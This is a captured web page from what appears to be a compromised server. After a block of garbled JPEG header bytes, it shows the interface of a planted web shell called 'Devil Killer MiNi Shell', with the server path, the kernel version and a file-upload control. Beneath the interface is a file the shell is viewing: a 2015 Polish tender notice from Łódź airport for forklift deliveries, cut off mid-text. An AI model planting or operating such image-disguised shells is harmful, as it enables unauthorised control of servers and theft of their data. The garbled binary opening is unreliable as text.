JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151123/316278-N-2015.html

<p class="kh_header"><b>Łódź: Dostawa wózków widłowych (ZNP/15/15)</b><br>
<b>Numer ogłoszenia: 316278 - 2015; data zamieszczenia: 23.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Port Lotniczy Łódź im. Władysława Reymonta sp. z o.o. , ul. gen. S. Maczka 35, 94-328 Łódź, woj. łódzkie, tel. 42 688-84-14, faks 42 6888384.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.airport.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: zamawiający sektorowy - zarządzanie lotniskami.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wózków widłowych (ZNP/15/15).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa wózków widłowych. 
Zamówienie składa się z 3 części:
Część 1 zamówienia: dostawa wózka widłowego (czołowego), elektrycznego o udźwigu nominalnym 1,5 t (tolerancja +200 kg);
Część 2 zamówienia: dostawa wózka do transportu poziomego (czołowego) z podestem (paleciak elektryczny) udźwig 2,0 t (tolerancja +200 kg);
Część 3 zamówienia: dostawa  wózka widłowego (czołowego), diesel, udźwig min. 12,0 t przy środku ciężkości 900 mm oraz z możliwością  podniesienia min. 6 t na wysokość min. 5500 mm przy środku ciężkości 1700 mm.
Szczegółowy opis przedmiotu zamówienia znajduje się w specyfikacji istotnych warunków zamówienia w postępowaniu ZNP/15/05 (dalej: SIWZ)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamówienie uzupełniające obejmuje udzielenie przez Wykonawcę gwarancji na dostarczone wózki widłowe na okres dodatkowych (po zakończeniu okresu gwarancji, wymaganego dla zamówienia podstawowego) maksymalnie 36 miesięcy wraz z wykonywaniem wszelkich przeglądów i serwisów, na warunkach określonych odpowiednio w Załączniku nr 7a do SIWZ dla Części I zamówienia, Załączniku nr 7b do SIWZ dla Części II zamówienia oraz  Załączniku nr 7c do SIWZ dla Części III zamówienia, w tym także do wykonywania wszelkich czynności związanych z dozorem technicznym sprawowanym przez Urząd Dozoru Technicznego zgodnie z ustawą z dnia 21 grudnia 2000 r. o dozorze technicznym - tekst jedn. Dz. U. z 2013 r. poz. 963 ze zm. oraz legalizacją wag (jeśli dotyczy). Wartość zamówienia uzupełniającego nie przekroczy 15% wartości zamówienia podstawowego (w odniesieniu do każdej części zamówienia).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 42.41.51.10-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości: dla Części I zamówienia: 2 000,00 (słownie: dwa tysiące) złotych; dla Części III zamówienia: 13 500,00 (słownie: trzynaście tysięcy pięćset) złotych.
Okres ważności wadium musi obejmować cały okres związania ofertą (tj. okres 60 dni od dnia upływu terminu składania ofert). Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego: 30 1240 6292 1111 0010 3957 6801. Na przelewie winien znajdować się numer i nazwa postępowania. Do oferty winna zostać dołączona kopia polecenia przelewu (potwierdzona za zgodność z oryginałem), w przypadku składania wadium w formie innej niż w pieniądzu do oferty należy dołączyć oryginał dokumentu potwierdzającego gwarancję lub poręczenie. Termin wniesienia wadium: Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego, Zamawiający będzie uważał za skuteczne tylko wówczas, gdy zostanie zaksięgowane na rachunku Zamawiającego przed upływem terminu składania ofert. Pozostałe postanowienia dotyczące wadium zawarte są w pkt X (Wadium) SIWZ w postępowaniu ZNP/15/15.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wskazuje żadnych szczególnych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:
dla Części I zamówienia:
w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał co najmniej jedną dostawę obejmującą co najmniej jeden wózek widłowy (czołowy), elektryczny o udźwigu nominalnym co najmniej 1,2 t i nie więcej niż 1,8 t, a dostawa wykonana została lub jest wykonywana należycie. 
dla Części II zamówienia:
w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał co najmniej jedną dostawę obejmującą co najmniej jeden wózek do transportu poziomego (czołowego) z podestem (paleciak elektryczny) o udźwigu co najmniej 1,7 t i nie więcej niż 2,3 t, a dostawa wykonana została lub jest wykonywana należycie. 
dla Części III zamówienia:
w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał co najmniej jedną dostawę obejmującą co najmniej jeden wózek widłowy (czołowy), diesel, o udźwigu co najmniej 12,0 t, a dostawa wykonana została lub jest wykonywana należycie. 
Uwaga! 
Zamawiający dopuszcza wykazanie spełnienia warunków udziału w postępowaniu, o których mowa w niniejszym pkt - III.3.2 - (dla Części I , Części II, Części III zamówienia) poprzez wskazanie tego samego zamówienia, które swoim zakresem obejmowało co najmniej zakres wskazany w ww. warunkach (w tym ilość wózków i rodzaj wózków).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wskazuje żadnych szczególnych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wskazuje żadnych szczególnych warunków w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:
dla Części I zamówienia:
 jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 70.000,00  (siedemdziesiąt tysięcy) zł.
dla Części II zamówienia:
 jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 20.000,00 (dwadzieścia tysięcy) zł.
dla Części III zamówienia:
 jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę co najmniej 450 000,00 (czterysta pięćdziesiąt tysięcy) zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty potwierdzające, że zaoferowane wózki widłowe spełniają wymagania określone w Załączniku nr 6 do SIWZ - w szczególności opisy, fotografie, instrukcje obsługi zaoferowanych wózków widłowych - w przypadku przedstawienia kopii - dokumenty muszą zostać potwierdzone za zgodność z oryginałem przez osobę uprawniona do reprezentacji Wykonawcy;</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, określające zakres umocowania podpisane przez osoby uprawnione do reprezentacji Wykonawcy - jeżeli Wykonawcę reprezentuje pełnomocnik, w formie oryginału lub kopii poświadczonej przez notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
 Zamawiający przewiduje dokonanie wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej na Platformie aukcji elektronicznych Portu Lotniczego Łódź pod adresem http://lodzairport.proe.biz. Zamawiający przeprowadzi aukcję elektroniczną, jeżeli zostaną złożone, co najmniej 2 (dwie) oferty niepodlegające odrzuceniu w postępowaniu. Zaproszenie do udziału w aukcji elektronicznej zostanie wysłane drogą elektroniczną na adres e-mail wskazany przez Wykonawcę w Formularzu oferty. Warunki przeprowadzania aukcji elektronicznej zawarte zostały w pkt XV. SIWZ w postępowaniu ZNP/15/15.</p><p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy na zasadach określonych w SIWZ w postępowaniu ZNP/15/15.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.airport.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Port Lotniczy Łódź im. Władysława Reymonta sp. z o.o., Zespół ds. Zamówień Publicznych i Umów, ul. Gen. S. Maczka 35, 94-328 Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2015 godzina 14:00, miejsce: Port Lotniczy Łódź im. Władysława Reymonta sp. z o.o., Biuro Zarządu, ul. Gen. S. Maczka 35, 94-328 Łódź.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 60 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ilekroć mowa w niniejszym ogłoszeniu o specyfikacji lub SIWZ należy przez to rozumieć Specyfikację Istotnych Warunków Zamówienia w postępowaniu ZNP/15/15. Postępowanie zostanie przeprowadzone na podstawie Regulaminu udzielania zamówień, przyjętego Zarządzeniem Nr 20/2007 Prezesa Zarządu Portu Lotniczego Łódź im. Władysława Reymonta Sp. z o.o. z dnia 28 sierpnia 2007 r., wraz z ostatnią zmianą wynikającą z Uchwały Nr 2/2014 Zarządu Portu Lotniczego Łódź im. Władysława Reymonta Sp. z o.o. dnia 30 kwietnia 2014 r. oraz na podstawie postanowień Specyfikacji Istotnych Warunków Zamówienia. Zamawiający przewiduje możliwość zmiany niniejszego Ogłoszenia, o ile konieczność takiej zmiany będzie wynikała z niezgodności treści niniejszego Ogłoszenia z treścią SIWZ.
Zamawiający zastrzega możliwość zmiany treści niniejszego Ogłoszenia oraz możliwość zmiany treści SIWZ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa wózka widłowego (czołowego), elektrycznego o udźwigu nominalnym 1,5 t (tolerancja +200 kg).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje w zakresie Części I zamówienia:
dostawę do siedziby Zamawiającego wózka widłowego (czołowego), elektrycznego o udźwigu nominalnym 1,5 t (tolerancja +200 kg) - zwanego dalej (w odniesieniu do tej części zamówienia) wózkiem widłowym, transport wózka widłowego do siedziby Zamawiającego (płyta lotniska, w miejscu wskazanym przez Zamawiającego), rozładunek i zmontowanie wózka widłowego w siedzibie Zamawiającego, uruchomienie wózka widłowego w siedzibie Zamawiającego, przeprowadzenie szkolenia stanowiskowego personelu Zamawiającego dla 20 osób wskazanych przez Zamawiającego (zgodnie z warunkami określonymi w projekcie umowy), wykonywanie usług serwisowych wózka widłowego w okresie gwarancji, w tym wszelkich przeglądów wymaganych przepisami prawa oraz dokumentacją techniczno-rozruchową oraz wykonywanie wszelkich czynności związanych z dozorem technicznym sprawowanym przez Urząd Dozoru Technicznego zgodnie z ustawą z dnia 21 grudnia 2000 r. o dozorze technicznym (tekst jedn. Dz. U. z 2013 r. poz. 963 ze zm.), zwane dalej łącznie przedmiotem zamówienia (w odniesieniu do tej części zamówienia), zgodnie ze szczegółowymi warunkami opisanymi w Załączniku nr 6 do SIWZ oraz wzorem umowy stanowiącym Załącznik nr 7a do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.41.51.10-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania przedmiotu zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa wózka do transportu poziomego (czołowego) z podestem (paleciak elektryczny) udźwig 2,0 t (tolerancja +200 kg).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje w zakresie Części II zamówienia:
dostawę do siedziby Zamawiającego wózka do transportu poziomego (czołowego) z podestem (paleciak elektryczny) udźwig 2,0 t (tolerancja +200 kg) - zwanego dalej (w odniesieniu do tej części zamówienia) wózkiem widłowym, transport wózka widłowego do siedziby Zamawiającego (płyta lotniska, w miejscu wskazanym przez Zamawiającego), rozładunek i zmontowanie wózka widłowego w siedzibie Zamawiającego, uruchomienie wózka widłowego w siedzibie Zamawiającego, przeprowadzenie szkolenia stanowiskowego personelu Zamawiającego dla 20 osób wskazanych przez Zamawiającego (zgodnie z warunkami określonymi w projekcie umowy), wykonywanie usług serwisowych wózka widłowego w okresie gwarancji, w tym wszelkich przeglądów wymaganych przepisami prawa oraz dokumentacją techniczno-rozruchową oraz wykonywanie wszelkich czynności związanych z dozorem technicznym sprawowanym przez Urząd Dozoru Technicznego zgodnie z ustawą z dnia 21 grudnia 2000 r. o dozorze technicznym (tekst jedn. Dz. U. z 2013 r. poz. 963 ze zm.) oraz wykonywanie legalizacji wag, zgodnie z obowiązującymi w tym zakresie przepisami prawa (zakres, sposób, terminy), zwane dalej łącznie przedmiotem zamówienia (w odniesieniu do tej części zamówienia), zgodnie ze szczegółowymi warunkami opisanymi w Załączniku nr 6 do SIWZ oraz wzorem umowy stanowiącym Załącznik nr 7b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.41.51.10-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 70.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Termin wykonania przedmiotu zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa  wózka widłowego (czołowego), diesel, udźwig min. 12,0 t przy środku ciężkości 900 mm oraz z możliwością  podniesienia min. 6 t na wysokość min. 5500 mm przy środku ciężkości 1700 mm.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje w zakresie Części III zamówienia:
